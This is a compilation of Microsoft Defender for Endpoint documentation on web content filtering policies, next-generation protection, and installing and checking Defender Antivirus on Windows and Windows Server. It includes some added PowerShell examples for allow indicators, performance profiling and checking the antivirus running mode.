notification if an element on the page they're viewing is making calls to a blocked
resource.

Note

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

Web content filtering is available on the major web browsers, with blocks performed by
Windows Defender SmartScreen (Microsoft Edge) and network protection (Chrome,
Firefox, Brave, and Opera). For more information about browser support, see the
prerequisites section.

Note

Web content filtering does not apply policies to isolated browser sessions (for example,
Microsoft Defender Application Guard). The feature is also restricted to specific browsers
via process name. This means that web content filtering doesn't work when a local proxy
application (such as Fiddler or Zscaler) is in place, because the browser's process name is
masked behind the proxy's.

Benefits of web content filtering

- Users are prevented from accessing websites in blocked categories, whether they're
  browsing on-premises or away.
- Your security team can access web reports in the same central location, with visibility
  over actual blocks and web usage.
- If you are using Defender for Endpoint, your security team can conveniently deploy
  policies to groups of users using device groups defined in Microsoft Defender for
  Endpoint role-based access control settings.
- If you are using Defender for Business, you can define one web content filtering policy
  that will be applied to all users.

Prerequisites

Before trying out this feature, make sure you meet the requirements described in the
following table:

Requirement          Description
Subscription         Your subscription must include one of the following:
                     - Windows 10/11 Enterprise E5
                     - Microsoft 365 E5
                     - Microsoft 365 A5
                     - Microsoft 365 E5 Security
                     - Microsoft 365 E3
                     - Microsoft Defender for Endpoint Plan 1 or Plan 2
                     - Microsoft Defender for Business
                     - Microsoft 365 Business Premium
Portal access        You must have access to the Microsoft Defender portal.
Operating system     Your organization's devices must be running one of the following
                     operating systems with the latest antivirus/antimalware updates:
                     - Windows 11
                     - Windows 10 Anniversary Update (version 1607) or later
                     - For information on macOS availability, see Network Protection for macOS
                     - For information on Linux availability, see Network Protection for Linux
Browser              Your organization's devices must be running one of the following browsers:
                     - Microsoft Edge
                     - Google Chrome
                     - Mozilla Firefox
                     - Brave
                     - Opera
                     - Internet Explorer
Related protection   Windows Defender SmartScreen and network protection must be enabled on
                     your organization's devices.

Data handling
Data is stored in the region that was selected as part of your Microsoft Defender for
Endpoint data handling settings. Your data will not leave the data center in that region.
In addition, your data will not be shared with any third parties, including our data
providers.

Precedence for multiple active policies

Applying multiple different web content filtering policies to the same device results in the
more restrictive policy applying for each category. Consider the following scenario:

- Policy 1: blocks categories 1 and 2 and audits the rest
- Policy 2: blocks categories 3 and 4 and audits the rest

The result is that categories 1 - 4 are all blocked. (The original article illustrates this
with an image.)

Turn on web content filtering

1. Go to the Microsoft Defender portal and sign in.

2. In the navigation pane, select Settings > Endpoints > General > Advanced Features.

3. Scroll down until you see Web content filtering.

4. Switch the toggle to On, and then select Save preferences.

Configure web content filtering policies

Web content filtering policies specify which site categories are blocked on which device
groups. To manage the policies, go to Settings > Endpoints > Web content filtering (under
Rules).

Policies can be deployed to block any of the following parent or child categories:

Adult content
- Cults: Sites related to groups or movements whose members demonstrate passion for a
  belief system that is different from those that are socially accepted.
- Gambling: Online gambling and sites that promote gambling skills and practice.
- Nudity: Sites that provide full-frontal and semi-nude images or videos, typically in
  artistic form, and might allow the download or sale of such materials.
- Pornography / Sexually explicit: Sites containing sexually explicit content in an
  image-based or textual form. Any form of sexually oriented material is also listed here.
- Sex education: Sites that discuss sex and sexuality in an informative and non-voyeuristic
  way, including sites that provide education about human reproduction and contraception,
  sites that offer advice on preventing infection from sexual diseases, and sites that
  offer advice on sexual health matters.
- Tasteless: Sites oriented towards content unsuitable for school children to view or that
  an employer would be uncomfortable with their staff accessing, but not necessarily
  violent or pornographic.
- Violence: Sites that display or promote content related to violence against humans or
  animals.

High bandwidth
- Download sites: Sites whose primary function is to allow users to download media content
  or programs, such as computer programs.
- Image sharing: Sites that are used primarily for searching or sharing photos, including
  those that have social aspects.
- Peer-to-peer: Sites that host peer-to-peer (P2P) software or facilitate the sharing of
  files using P2P software.
- Streaming media & downloads: Sites whose primary function is the distribution of
  streaming media, or sites that allow users to search, watch, or listen to streaming media.

Legal liability
- Child abuse images: Sites that include child abuse images or pornography.
- Criminal activity: Sites that give instruction on, advice about, or promotion of illegal
  activities.
- Hacking: Sites that provide resources for illegal or questionable use of computer
  software or hardware, including sites that distribute copyrighted material that has been
  cracked.
- Hate & intolerance: Sites promoting aggressive, degrading, or abusive opinions about any
  section of the population that could be identified by race, religion, gender, age,
  nationality, physical disability, economic situation, sexual preferences or any other
  lifestyle choice.
- Illegal drug: Sites that sell illegal/controlled substances, promote substance abuse, or
  sell related paraphernalia.
- Illegal software: Sites that contain or promote the use of malware, spyware, botnets,
  phishing scams, or piracy & copyright theft.
- School cheating: Sites related to plagiarism or school cheating.
- Self-harm: Sites that promote self-harm, including cyberbullying sites that contain
  abusive and/or threatening messages towards users.
- Weapons: Any site that sells weapons or advocates the use of weapons, including but not
  limited to guns, knives, and ammunition.

Leisure
- Chat: Sites that are primarily web-based chat rooms.
- Games: Sites relating to video or computer games, including sites that promote gaming
  through hosting online services or information related to gaming.
- Instant messaging: Sites that can be used to download instant messaging software or
  client based instant messaging.
- Professional network: Sites that provide professional networking services.
- Social networking: Sites that provide social networking services.
- Web-based email: Sites offering web-based mail services.

Uncategorized
- Newly registered domains: Sites that have been newly registered in the past 30 days and
  have not yet been moved to another category.
- Parked domains: Sites that have no content or are parked for later use.

Note

Uncategorized contains only newly registered domains and parked domains, and does not
include all other sites outside of these categories.

Create a policy

To add a new policy, follow these steps:

1. In the Microsoft Defender portal, choose Settings > Endpoints > Web content filtering >
   + Add policy.

2. Specify a name.

3. Select the categories to block. Use the expand icon to fully expand each parent category
   and select specific web content categories.

4. Specify the policy scope. Select the device groups to specify where to apply the policy.
   Only devices in the selected device groups will be prevented from accessing websites in
   the selected categories.

   Important

   If you're using either Microsoft 365 Business Premium or Defender for Business, your web
   content filtering policy is applied to all users by default. Scoping does not apply.

5. Review the summary and save the policy.

Note

- There might be up to 2 hours of latency between the time a policy is created and when
  it's enforced on the device.
- You can deploy a policy without selecting any category on a device group. This action
  creates an audit-only policy to help you understand user behavior before creating a
  block policy.
- If you are removing a policy or changing device groups at the same time, there could be
  a delay in policy deployment.
- Blocking the "Uncategorized" category could lead to unexpected and undesired results.

End-user experience

The blocking experience for supported third-party browsers is provided by network
protection, which shows a system-level message notifying the user of a blocked
connection. For a more user-friendly, in-browser experience, consider using Microsoft Edge.

Allow specific websites

It's possible to override a blocked category in web content filtering to allow a single site
by creating a custom indicator policy. The custom indicator policy supersedes the web
content filtering policy when it's applied to the device group in question.

To define a custom indicator, follow these steps:

1. In the Microsoft Defender portal , go to Settings > Endpoints > Indicators >
URL/Domain > Add Item.

2. Enter the domain of the site.

3. Set the policy action to Allow.
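The portal steps above can also be scripted, which is useful when the same exception has to be applied for several device groups or when exceptions should expire automatically. The following PowerShell is an added example that is not from the Microsoft article. It creates an Allow indicator of type DomainName through the Defender for Endpoint Indicators API and then reads it back. It assumes $Token holds an OAuth bearer token for an app registration with the Ti.ReadWrite.All application permission; the domain, group name and expiry window are illustrative.

```powershell
# Added example (not from the Microsoft article): create an "Allow" domain
# indicator through the Defender for Endpoint Indicators API, optionally scoped
# to device groups, to override a web content filtering block for that domain.
# Assumptions: $Token is a bearer token for an app registration holding the
# Ti.ReadWrite.All application permission; the values used below are illustrative.

function New-WebAllowIndicator {
    param(
        [Parameter(Mandatory)] [string]$Domain,
        [Parameter(Mandatory)] [string]$Token,
        [string[]]$DeviceGroup,                 # device group names; omit = all devices
        [string]$Description = 'Allowed pending a web content filtering category dispute',
        [int]$ExpiresInDays = 30                # keep exceptions time-boxed
    )
    $body = @{
        indicatorValue = $Domain
        indicatorType  = 'DomainName'
        action         = 'Allowed'
        title          = "WCF exception: $Domain"
        description    = $Description
        expirationTime = (Get-Date).ToUniversalTime().AddDays($ExpiresInDays).ToString('o')
    }
    # rbacGroupNames scopes the indicator to device groups, like the portal's scope picker.
    if ($DeviceGroup) { $body['rbacGroupNames'] = $DeviceGroup }

    Invoke-RestMethod -Method Post `
        -Uri 'https://api.securitycenter.microsoft.com/api/indicators' `
        -Headers @{ Authorization = "Bearer $Token" } `
        -ContentType 'application/json' `
        -Body ($body | ConvertTo-Json)
}

function Get-WebIndicator {
    param([Parameter(Mandatory)] [string]$Domain, [Parameter(Mandatory)] [string]$Token)
    # Read back every indicator for the domain, so a conflicting Block entry is visible too.
    $r = Invoke-RestMethod -Method Get `
        -Uri "https://api.securitycenter.microsoft.com/api/indicators?`$filter=indicatorValue eq '$Domain'" `
        -Headers @{ Authorization = "Bearer $Token" }
    $r.value | Select-Object id, indicatorType, action, rbacGroupNames, expirationTime
}

# Usage (illustrative values):
# New-WebAllowIndicator -Domain 'vendorportal.example' -DeviceGroup 'Finance' -Token $Token
# Get-WebIndicator -Domain 'vendorportal.example' -Token $Token
```

Setting an expiry forces the exception to be revisited once the category dispute has been resolved, instead of accumulating permanent allow rules that quietly widen the policy.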

Dispute categories
If you encounter a domain that has been incorrectly categorized, you can dispute the
category directly from the Microsoft Defender portal.

To dispute the category of a domain, navigate to Reports > Web protection > Web
content filtering categories details > Domains. On the domains tab of the Web Content
Filtering reports, find the ellipsis beside each of the domains. Hover over the ellipsis and
then select Dispute Category.

A panel opens where you can select the priority and add more details such as the
suggested category for recategorization. Once you complete the form, select Submit.
Our team will review the request within one business day. For immediate unblocking,
create a custom allow indicator.

Web content filtering cards and details

Select Reports > Web protection to view cards with information about web content filtering
and web threat protection. The following cards provide summary information about web
content filtering.

Web activity by category

This card lists the parent web content categories with the largest increase or decrease in
the number of access attempts. Use it to spot drastic changes in web activity patterns in
your organization over the last 30 days, 3 months, or 6 months. Select a category name to
view more information.

In the first 30 days of using this feature, your organization might not have enough data
to display this information.

Web content filtering summary card

This card displays the distribution of blocked access attempts across the different parent
web content categories. Select one of the colored bars to view more information about a
specific parent web category.

Web activity summary card

This card displays the total number of requests for web content in all URLs.

View card details

You can access the Report details for each card by selecting a table row or colored bar
from the chart in the card. The report details page for each card contains extensive
statistical data about web content categories, website domains, and device groups.

- Web categories: Lists the web content categories that have had access attempts in your
  organization. Select a specific category to open a summary flyout.
- Domains: Lists the web domains that have been accessed or blocked in your organization.
  Select a specific domain to view detailed information about that domain.
- Device groups: Lists all the device groups that have generated web activity in your
  organization.

Use the time range filter at the top left of the page to select a time period. You can also
filter the information or customize the columns. Select a row to open a flyout pane with
even more information about the selected item.

Known issues and limitations

Network protection doesn't currently perform TLS (SSL) inspection, which can result in some
sites being allowed by web content filtering that would otherwise be blocked. Once the TLS
handshake has completed, network protection has no visibility into the encrypted traffic and
can't parse certain redirects, including redirections from some web-based mail login pages to
the mailbox page. As an accepted workaround, you can create a custom block indicator for the
login page so that no user can reach the site. Keep in mind that this might also block access
to other services hosted under the same domain.

If you're using Microsoft 365 Business Premium or Microsoft Defender for Business, you can
define one web content filtering policy for your environment. That policy applies to all
users by default.

See also
Web protection overview
Web threat protection
Monitor web security
Respond to web threats
Requirements for Network Protection


Next-generation protection overview
Article • 07/18/2023

Applies to:

Microsoft Defender Antivirus
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Platforms

Windows

Microsoft Defender for Endpoint includes next-generation protection to reinforce the
security perimeter of your network. Next-generation protection was designed to catch all
types of emerging threats. In addition to Microsoft Defender Antivirus, your next-generation
protection services include the following capabilities:

- Behavior-based, heuristic, and real-time antivirus protection, which includes always-on
  scanning using file and process behavior monitoring and other heuristics (also known as
  real-time protection). It also includes detecting and blocking apps that are deemed
  unsafe but might not be detected as malware.
- Cloud-delivered protection, which includes near-instant detection and blocking of new
  and emerging threats.
- Dedicated protection and product updates, which includes updates related to keeping
  Microsoft Defender Antivirus up to date.

Next-generation protection is included in both Defender for Endpoint Plan 1 and Plan 2.
Next-generation protection is also included in Microsoft Defender for Business and
Microsoft 365 Business Premium.

To configure next-generation protection services, see Configure Microsoft Defender
Antivirus features.

If you're looking for antivirus-related information for other platforms, see one of the
following articles:

- Set preferences for Microsoft Defender for Endpoint on macOS
- Microsoft Defender for Endpoint on Mac
- macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
- Set preferences for Microsoft Defender for Endpoint on Linux
- Microsoft Defender for Endpoint on Linux
- Configure Defender for Endpoint on Android features
- Configure Microsoft Defender for Endpoint on iOS features

Tip

Performance tip: Due to a variety of factors (examples listed below), Microsoft Defender
Antivirus, like other antivirus software, can cause performance issues on endpoint devices.
In some cases, you might need to tune the performance of Microsoft Defender Antivirus to
alleviate those issues. Microsoft's Performance analyzer is a PowerShell command-line tool
that helps determine which files, file paths, processes, and file extensions might be
causing performance issues; some examples are:

- Top paths that impact scan time
- Top files that impact scan time
- Top processes that impact scan time
- Top file extensions that impact scan time
- Combinations, for example:
  - top files per extension
  - top paths per extension
  - top processes per path
  - top scans per file
  - top scans per file per process

You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See Performance analyzer for Microsoft
Defender Antivirus.
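As an added example that is not from the Microsoft article, here is how a practitioner would use the Performance analyzer cmdlets mentioned in the tip on a device where scans are slow: record while reproducing the workload, then report the top contributors and one of the combinations listed above. The cmdlet names are the documented ones (New-MpPerformanceRecording and Get-MpPerformanceReport); the recording path, duration and counts are arbitrary choices, and the Top* switch names used here mirror the bullets above, so check Get-Help Get-MpPerformanceReport for the full set on your platform version.

```powershell
# Added example (not from the Microsoft article): capture a Microsoft Defender
# Antivirus performance recording and report the top scan-time contributors.
# Run elevated. Recording path, duration and counts are arbitrary choices.

function Invoke-DefenderScanProfile {
    param(
        [string]$RecordTo = "$env:TEMP\MDAV-perf.etl",
        [int]$Seconds = 60,
        [int]$Top = 10
    )
    # Record real-time protection activity for the given window. Reproduce the
    # slow workload (build, backup, database job, ...) while this runs.
    New-MpPerformanceRecording -RecordTo $RecordTo -Seconds $Seconds

    # One Top* switch per bullet in the tip: paths, files, processes, extensions, scans.
    Get-MpPerformanceReport -Path $RecordTo `
        -TopPaths $Top -TopFiles $Top -TopProcesses $Top -TopExtensions $Top -TopScans $Top

    # Combinations narrow a noisy top-level result down to an exclusion candidate,
    # e.g. which files of a hot extension are scanned most, and which scans hit one file.
    Get-MpPerformanceReport -Path $RecordTo -TopExtensions 3 -TopFilesPerExtension 5
    Get-MpPerformanceReport -Path $RecordTo -TopFiles 3 -TopScansPerFile 5
}

Invoke-DefenderScanProfile -Seconds 120
```

Treat the report as evidence for a narrowly scoped exclusion (one process or one path), not as a reason to exclude a whole extension or drive; every exclusion is also a blind spot for the detections the rest of this page describes.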

Microsoft Defender Antivirus in Windows
Article • 01/16/2024

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business
Microsoft Defender Antivirus

Platforms

Windows

Microsoft Defender Antivirus is available in Windows 10 and Windows 11, and in versions of
Windows Server.

Microsoft Defender Antivirus is a major component of your next-generation protection in
Microsoft Defender for Endpoint. This protection brings together machine learning, big-data
analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to
protect devices (or endpoints) in your organization. Microsoft Defender Antivirus is built
into Windows, and it works with Microsoft Defender for Endpoint to provide protection on
your device and in the cloud.

Compatibility with other antivirus products

If you're using a non-Microsoft antivirus/antimalware product on your device, you might be
able to run Microsoft Defender Antivirus in passive mode alongside the non-Microsoft
antivirus solution. It depends on the operating system used and whether your device is
onboarded to Defender for Endpoint. To learn more, see Microsoft Defender Antivirus
compatibility.

Microsoft Defender Antivirus processes and


services
The following table summarizes Microsoft Defender Antivirus processes and services.
You can view them in Task Manager in Windows.

Process or service: Microsoft Defender Antivirus Core service (MdCoreSvc)
- Processes tab: Antimalware Core Service
- Details tab: MpDefenderCoreService.exe
- Services tab: Microsoft Defender Core Service

Process or service: Microsoft Defender Antivirus service (WinDefend)
- Processes tab: Antimalware Service Executable
- Details tab: MsMpEng.exe
- Services tab: Microsoft Defender Antivirus

Process or service: Microsoft Defender Antivirus Network Realtime Inspection service (WdNisSvc)
- Processes tab: Microsoft Network Realtime Inspection Service
- Details tab: NisSrv.exe
- Services tab: Microsoft Defender Antivirus Network Inspection Service

Process or service: Microsoft Defender Antivirus command-line utility
- Processes tab: N/A
- Details tab: MpCmdRun.exe
- Services tab: N/A

Process or service: Microsoft Security Client Policy Configuration Tool
- Processes tab: N/A
- Details tab: ConfigSecurityPolicy.exe
- Services tab: N/A

For Microsoft Endpoint Data Loss Prevention (Endpoint DLP), the following table
summarizes processes and services. You can view them in Task Manager in Windows.

Process or service: Microsoft Endpoint DLP service (MDDlpSvc)
- Processes tab: MpDlpService.exe
- Details tab: MpDlpService.exe
- Services tab: Microsoft Data Loss Prevention Service

Process or service: Microsoft Endpoint DLP command-line utility
- Processes tab: N/A
- Details tab: MpDlpCmd.exe
- Services tab: N/A

Microsoft Defender Core service

To enhance your endpoint security experience, Microsoft is releasing the Microsoft
Defender Core service to help with the stability and performance of Microsoft Defender
Antivirus. For customers who are using Microsoft Endpoint Data Loss Prevention in the
small, medium, and enterprise business sectors, Microsoft is splitting the codebase to its
own service.

The Microsoft Defender Core service is releasing with Microsoft Defender Antivirus
platform version 4.18.23110.2009.

Rollout begins in November 2023 to prerelease customers, with plans to release to
all enterprise customers in the coming months.

Enterprise customers should allow the following URLs:

*.events.data.microsoft.com
*.endpoint.security.microsoft.com
*.ecs.office.com

Enterprise U.S. Government customers should allow the following URLs:

*.events.data.microsoft.com
*.endpoint.security.microsoft.us (GCC-H & DoD)
*.gccmod.ecs.office.com (GCC-M)
*.config.ecs.gov.teams.microsoft.us (GCC-H)
*.config.ecs.dod.teams.microsoft.us (DoD)

If you're using Application Control for Windows, or you're running non-Microsoft
antivirus or endpoint detection and response software, make sure to add the
processes mentioned earlier to your allow list.

Consumers need not take any actions to prepare.

Comparing active mode, passive mode, and disabled mode
The following table describes what to expect when Microsoft Defender Antivirus is in
active mode, passive mode, or disabled.

Mode: Active mode
What happens: In active mode, Microsoft Defender Antivirus is used as the primary antivirus app
on the device. Files are scanned, threats are remediated, and detected threats are
listed in your organization's security reports and in your Windows Security app.

Mode: Passive mode
What happens: In passive mode, Microsoft Defender Antivirus is not used as the primary
antivirus app on the device. Files are scanned, and detected threats are reported,
but threats are not remediated by Microsoft Defender Antivirus.

IMPORTANT: Microsoft Defender Antivirus can run in passive mode only on
endpoints that are onboarded to Microsoft Defender for Endpoint. See
Requirements for Microsoft Defender Antivirus to run in passive mode.

Mode: Disabled or uninstalled
What happens: When disabled or uninstalled, Microsoft Defender Antivirus is not used. Files are
not scanned, and threats are not remediated. In general, we do not recommend
disabling or uninstalling Microsoft Defender Antivirus.

To learn more, see Microsoft Defender Antivirus compatibility.

Check the state of Microsoft Defender Antivirus on your device
You can use one of several methods, such as the Windows Security app or Windows
PowerShell, to check the state of Microsoft Defender Antivirus on your device.

Important

Beginning with platform version 4.18.2208.0 and later: If a server has been
onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender"
group policy setting will no longer completely disable Windows Defender Antivirus
on Windows Server 2012 R2 and later. Instead, it will place it into passive mode. In
addition, the tamper protection feature will allow a switch to active mode but not
to passive mode.

If "Turn off Windows Defender" is already in place before onboarding to
Microsoft Defender for Endpoint, there will be no change and Defender
Antivirus will remain disabled.

To switch Defender Antivirus to passive mode, even if it was disabled before
onboarding, you can apply the ForceDefenderPassiveMode configuration
with a value of 1. To place it into active mode, switch this value to 0 instead.

Note the modified logic for ForceDefenderPassiveMode when tamper protection is
enabled: Once Microsoft Defender Antivirus is toggled to active mode, tamper
protection will prevent it from going back into passive mode even when
ForceDefenderPassiveMode is set to 1.

Use the Windows Security app to check the status of Microsoft Defender Antivirus
1. On your Windows device, select the Start menu, and begin typing Security. Then
open the Windows Security app in the results.

2. Select Virus & threat protection.

3. Under Who's protecting me?, choose Manage Providers.

You'll see the name of your antivirus/antimalware solution on the security providers
page.

Use PowerShell to check the status of Microsoft Defender Antivirus
1. Select the Start menu, and begin typing PowerShell. Then open Windows
PowerShell in the results.

2. Type Get-MpComputerStatus.

3. In the list of results, look at the AMRunningMode row.

Normal means Microsoft Defender Antivirus is running in active mode.

Passive mode means Microsoft Defender Antivirus is running, but is not the
primary antivirus/antimalware product on your device. Passive mode is only
available for devices that are onboarded to Microsoft Defender for Endpoint
and that meet certain requirements. To learn more, see Requirements for
Microsoft Defender Antivirus to run in passive mode.

EDR Block Mode means Microsoft Defender Antivirus is running and
Endpoint detection and response (EDR) in block mode, a capability in
Microsoft Defender for Endpoint, is enabled. Check the
ForceDefenderPassiveMode registry key. If its value is 0, it is running in
normal mode; otherwise, it is running in passive mode.

SxS Passive Mode means Microsoft Defender Antivirus is running alongside
another antivirus/antimalware product, and limited periodic scanning is used.
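As an added example (not code from the Microsoft article), the following PowerShell function pulls together the checks this article describes: it looks up the services from the processes-and-services table, reads AMRunningMode from Get-MpComputerStatus, and applies the ForceDefenderPassiveMode rule the article gives for EDR Block Mode. The function name Get-DefenderRuntimeState is my own; the registry path is the one the Windows Server article in this documentation gives for ForceDefenderPassiveMode, and treating an absent value as 0 is an assumption.

```powershell
# Added example, not from the Microsoft article. Run in an elevated Windows
# PowerShell session on a device that has the Defender cmdlets (Get-MpComputerStatus).
function Get-DefenderRuntimeState {
    [CmdletBinding()]
    param()

    # Service names from the processes-and-services table. MdCoreSvc only exists on
    # platform 4.18.23110.2009 or later, so older platforms report it as NotInstalled.
    $serviceNames = 'WinDefend', 'WdNisSvc', 'MdCoreSvc'
    $services = foreach ($name in $serviceNames) {
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Service = $name
            Status  = if ($svc) { $svc.Status.ToString() } else { 'NotInstalled' }
        }
    }

    # ForceDefenderPassiveMode lives under the Defender for Endpoint policy key
    # (path as given in the Windows Server article). Assumption: absent means 0.
    $regPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    $forcePassive = (Get-ItemProperty -Path $regPath -Name ForceDefenderPassiveMode `
                         -ErrorAction SilentlyContinue).ForceDefenderPassiveMode
    if ($null -eq $forcePassive) { $forcePassive = 0 }

    $status = Get-MpComputerStatus
    $mode   = $status.AMRunningMode

    # Map AMRunningMode to the meaning the article gives for each value
    # (switch is case-insensitive, so the exact casing of the value does not matter).
    $meaning = switch ($mode) {
        'Normal' { 'Active mode: Defender Antivirus is the primary antivirus product.' }
        'Passive mode' { 'Passive mode: files are scanned and threats reported, but not remediated by Defender Antivirus.' }
        'EDR Block Mode' {
            # For EDR Block Mode the article says to consult ForceDefenderPassiveMode.
            if ($forcePassive -eq 0) { 'EDR in block mode; Defender Antivirus in normal mode.' }
            else { 'EDR in block mode; Defender Antivirus in passive mode.' }
        }
        'SxS Passive Mode' { 'Side-by-side passive mode: another product is primary; limited periodic scanning is used.' }
        default { "AMRunningMode '$mode' is not one of the values described in the article." }
    }

    [pscustomobject]@{
        AMRunningMode            = $mode
        Interpretation           = $meaning
        ForceDefenderPassiveMode = $forcePassive
        AntivirusEnabled         = $status.AntivirusEnabled
        RealTimeProtection       = $status.RealTimeProtectionEnabled
        PlatformVersion          = $status.AMProductVersion
        TamperProtected          = $status.IsTamperProtected
        Services                 = $services
    }
}

# Usage:
Get-DefenderRuntimeState | Format-List
```

The Services property is the quickest way to spot a Core service that an application-control or third-party EDR allow list is blocking, which is the situation the Microsoft Defender Core service section asks you to prepare for.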

 Tip
To learn more about the Get-MpComputerStatus PowerShell cmdlet, see the
reference article Get-MpComputerStatus.

Tip

Performance tip: Due to a variety of factors (examples listed below), Microsoft
Defender Antivirus, like other antivirus software, can cause performance issues on
endpoint devices. In some cases, you might need to tune the performance of
Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's
Performance analyzer is a PowerShell command-line tool that helps determine
which files, file paths, processes, and file extensions might be causing performance
issues; some examples are:

Top paths that impact scan time
Top files that impact scan time
Top processes that impact scan time
Top file extensions that impact scan time
Combinations – for example:
top files per extension
top paths per extension
top processes per path
top scans per file
top scans per file per process

You can use the information gathered using Performance analyzer to better assess
performance issues and apply remediation actions. See: Performance analyzer for
Microsoft Defender Antivirus.

Get your antivirus/antimalware platform updates
It's important to keep Microsoft Defender Antivirus (or any antivirus/antimalware
solution) up to date. Microsoft releases regular updates to help ensure that your devices
have the latest technology to protect against new malware and attack techniques. To
learn more, see Manage Microsoft Defender Antivirus updates and apply baselines.

 Tip
If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

See also
Performance analyzer for Microsoft Defender Antivirus
Microsoft Defender Antivirus management and configuration
Evaluate Microsoft Defender Antivirus protection
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus



Microsoft Defender Antivirus on Windows Server
Article • 04/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Microsoft Defender Antivirus is available in the following editions/versions of Windows
Server:

Windows Server 2022
Windows Server 2019
Windows Server, version 1803 or later
Windows Server 2016
Windows Server 2012 R2 (Requires Microsoft Defender for Endpoint)

Setting up Microsoft Defender Antivirus on Windows Server
The process of setting up and running Microsoft Defender Antivirus on Windows Server
includes the following steps:

1. Enable the interface.
2. Install Microsoft Defender Antivirus.
3. Verify Microsoft Defender Antivirus is running.
4. Update your antimalware Security intelligence.
5. (As needed) Submit samples.
6. (As needed) Configure automatic exclusions.
7. (Only if necessary) Set Windows Server to passive mode.

Enable the user interface on Windows Server

Important

If you're using Windows Server 2012 R2, see Options to install Microsoft Defender
for Endpoint.

By default, Microsoft Defender Antivirus is installed and functional on Windows Server.
Sometimes, the user interface (GUI) is installed by default. The GUI isn't required; you
can use PowerShell, Group Policy, or other methods to manage Microsoft Defender
Antivirus. However, many organizations prefer to use the GUI for Microsoft Defender
Antivirus. To install the GUI, use one of the procedures in the following table:

Procedure: Turn on the GUI using the Add Roles and Features Wizard
What to do:
1. See Install roles, role services, and features by using the add Roles and Features
Wizard, and use the Add Roles and Features Wizard.
2. When you get to the Features step of the wizard, under Windows Defender Features,
select the GUI for Windows Defender option.

Procedure: Turn on the GUI using PowerShell
What to do:
1. On your Windows Server, open Windows PowerShell as an administrator.
2. Run the following PowerShell cmdlet: Install-WindowsFeature -Name Windows-Defender-GUI

For more information, see Getting Started with PowerShell.

Install Microsoft Defender Antivirus on Windows Server
If you need to install or reinstall Microsoft Defender Antivirus on Windows Server, use
one of the procedures in the following table:

Procedure: Use the Add Roles and Features Wizard to install Microsoft Defender Antivirus
What to do:
1. See Install or Uninstall Roles, Role Services, or Features, and use the Add Roles
and Features Wizard.
2. When you get to the Features step of the wizard, select the Microsoft Defender
Antivirus option. Also select the GUI for Windows Defender option.

Procedure: Use PowerShell to install Microsoft Defender Antivirus
What to do:
1. On your Windows Server, open Windows PowerShell as an administrator.
2. Run the following PowerShell cmdlet: Install-WindowsFeature -Name Windows-Defender

Note

Event messages for the antimalware engine included with Microsoft Defender
Antivirus can be found in Microsoft Defender Antivirus Events.

Verify Microsoft Defender Antivirus is running
After you've installed (or reinstalled) Microsoft Defender Antivirus, your next step is to
verify that it's running. Use the PowerShell cmdlets in the following table:

Procedure: Verify that Microsoft Defender Antivirus is running
PowerShell cmdlet: Get-Service -Name windefend

Procedure: Verify that firewall protection is turned on
PowerShell cmdlet: Get-Service -Name mpssvc

As an alternative to PowerShell, you can use Command Prompt to verify that Microsoft
Defender Antivirus is running. To do that, run the following command from a command
prompt:

Windows Command Prompt

sc query Windefend

The sc query command returns information about the Microsoft Defender Antivirus
service. When Microsoft Defender Antivirus is running, the STATE value displays
RUNNING .

To list all services, including those that aren't running, run the following command
from a command prompt:

Windows Command Prompt

sc query state= all


Update antimalware Security intelligence

Important

Beginning with platform version 4.18.2208.0 and later: If a server has been
onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender"
group policy setting will no longer completely disable Windows Defender Antivirus
on Windows Server 2012 R2 and later. Instead, it will place it into passive mode. In
addition, the tamper protection feature will allow a switch to active mode but not
to passive mode.

If "Turn off Windows Defender" is already in place before onboarding to
Microsoft Defender for Endpoint, there will be no change and Defender
Antivirus will remain disabled.

To switch Defender Antivirus to passive mode, even if it was disabled before
onboarding, you can apply the ForceDefenderPassiveMode configuration
with a value of 1. To place it into active mode, switch this value to 0 instead.

Note the modified logic for ForceDefenderPassiveMode when tamper protection is
enabled: Once Microsoft Defender Antivirus is toggled to active mode, tamper
protection will prevent it from going back into passive mode even when
ForceDefenderPassiveMode is set to 1.

To get your regular security intelligence updates, the Windows Update service must be
running. If you use an update management service, like Windows Server Update
Services (WSUS), make sure Microsoft Defender Antivirus Security intelligence updates
are approved for the computers you manage.

By default, Windows Update doesn't download and install updates automatically on
Windows Server 2019 or Windows Server 2022, or Windows Server 2016. You can
change this configuration by using one of the following methods:

Method: Windows Update in Control Panel
Description: Install updates automatically results in all updates being automatically
installed, including Windows Defender Security intelligence updates.
Download updates but let me choose whether to install them allows Windows Defender
to download and install Security intelligence updates automatically, but other
updates aren't automatically installed.

Method: Group Policy
Description: You can set up and manage Windows Update by using the settings available
in Group Policy, in the following path: Administrative Templates\Windows
Components\Windows Update\Configure Automatic Updates

Method: The AUOptions registry key
Description: The following two values allow Windows Update to automatically download
and install Security intelligence updates:
- 4 - Install updates automatically. This value results in all updates being
automatically installed, including Windows Defender Security intelligence updates.
- 3 - Download updates but let me choose whether to install them. This value allows
Windows Defender to download and install Security intelligence updates
automatically, but other updates aren't automatically installed.

To ensure that protection from malware is maintained, enable the following services:

Windows Error Reporting service
Windows Update service

The following table lists the services for Microsoft Defender Antivirus and the dependent
services.

Service Name: Windows Defender Service (WinDefend)
File Location: C:\Program Files\Windows Defender\MsMpEng.exe
Description: This service is the main Microsoft Defender Antivirus service that needs
to be running always.

Service Name: Windows Error Reporting Service (Wersvc)
